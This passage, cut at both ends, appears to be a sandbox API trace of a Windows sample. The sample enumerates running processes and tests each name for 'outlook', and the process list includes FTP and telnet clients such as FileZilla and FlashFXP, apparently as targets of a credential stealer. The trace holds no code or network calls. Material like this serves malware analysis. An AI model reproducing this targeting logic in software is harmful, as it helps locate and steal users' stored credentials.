lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.584] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357ad58 [0098.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357ad58, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0098.584] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0098.584] StrStrIA (lpFirst="nights-attending.exe", lpSrch="outlook") returned 0x0 [0098.584] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0098.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.586] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35784c8 [0098.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x35784c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0098.586] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0098.586] StrStrIA (lpFirst="installed.exe", lpSrch="outlook") returned 0x0 [0098.586] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0098.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0098.587] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356bac8 [0098.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356bac8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0098.587] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0098.587] StrStrIA (lpFirst="references compounds.exe", lpSrch="outlook") returned 0x0 [0098.587] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0098.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.588] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357ae58 [0098.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357ae58, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0098.588] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0098.589] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="outlook") returned 0x0 [0098.589] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0098.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.590] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357ae78 [0098.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357ae78, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0098.590] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0098.590] StrStrIA (lpFirst="registered try.exe", lpSrch="outlook") returned 0x0 [0098.590] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0098.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0098.591] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b910 [0098.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356b910, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0098.591] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0098.591] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="outlook") returned 0x0 [0098.591] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0098.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.593] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578600 [0098.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3578600, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0098.593] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0098.593] StrStrIA (lpFirst="invite.exe", lpSrch="outlook") returned 0x0 [0098.593] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0098.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.594] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3578648 [0098.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3578648, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0098.594] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0098.594] StrStrIA (lpFirst="idol.exe", lpSrch="outlook") returned 0x0 [0098.594] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0098.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0098.595] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356bb40 [0098.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356bb40, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0098.596] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0098.596] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="outlook") returned 0x0 [0098.596] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0098.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.637] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356bc08 [0098.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356bc08, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0098.637] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0098.637] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="outlook") returned 0x0 [0098.637] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0098.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.638] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3578438 [0098.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3578438, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0098.639] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0098.639] StrStrIA (lpFirst="powell_jane.exe", lpSrch="outlook") returned 0x0 [0098.639] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0098.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.640] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357af18 [0098.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357af18, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0098.640] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0098.640] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="outlook") returned 0x0 [0098.640] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0098.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.641] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35785d0 [0098.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x35785d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0098.641] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0098.641] StrStrIA (lpFirst="gainedshape.exe", lpSrch="outlook") returned 0x0 [0098.641] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0098.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.643] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357af98 [0098.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357af98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0098.643] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0098.643] StrStrIA (lpFirst="opens-versions.exe", lpSrch="outlook") returned 0x0 [0098.643] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0098.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0098.645] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356ba50 [0098.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356ba50, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0098.645] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0098.645] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="outlook") returned 0x0 [0098.645] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0098.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.646] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35785a0 [0098.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x35785a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0098.646] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0098.647] StrStrIA (lpFirst="3dftp.exe", lpSrch="outlook") returned 0x0 [0098.647] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0098.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.648] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357afb8 [0098.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357afb8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0098.648] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0098.648] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="outlook") returned 0x0 [0098.648] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0098.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.649] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578468 [0098.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3578468, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0098.649] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0098.649] StrStrIA (lpFirst="alftp.exe", lpSrch="outlook") returned 0x0 [0098.649] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0098.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.650] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578630 [0098.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3578630, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0098.651] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0098.651] StrStrIA (lpFirst="barca.exe", lpSrch="outlook") returned 0x0 [0098.651] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0098.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.652] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578690 [0098.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3578690, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0098.652] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0098.652] StrStrIA (lpFirst="bitkinex.exe", lpSrch="outlook") returned 0x0 [0098.652] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0098.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.653] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35783a8 [0098.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x35783a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0098.653] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0098.653] StrStrIA (lpFirst="coreftp.exe", lpSrch="outlook") returned 0x0 [0098.653] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0098.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0098.655] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3575000 [0098.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3575000, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0098.655] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0098.655] StrStrIA (lpFirst="far.exe", lpSrch="outlook") returned 0x0 [0098.655] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0098.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.656] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3578420 [0098.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3578420, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0098.656] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0098.656] StrStrIA (lpFirst="filezilla.exe", lpSrch="outlook") returned 0x0 [0098.656] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0098.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, 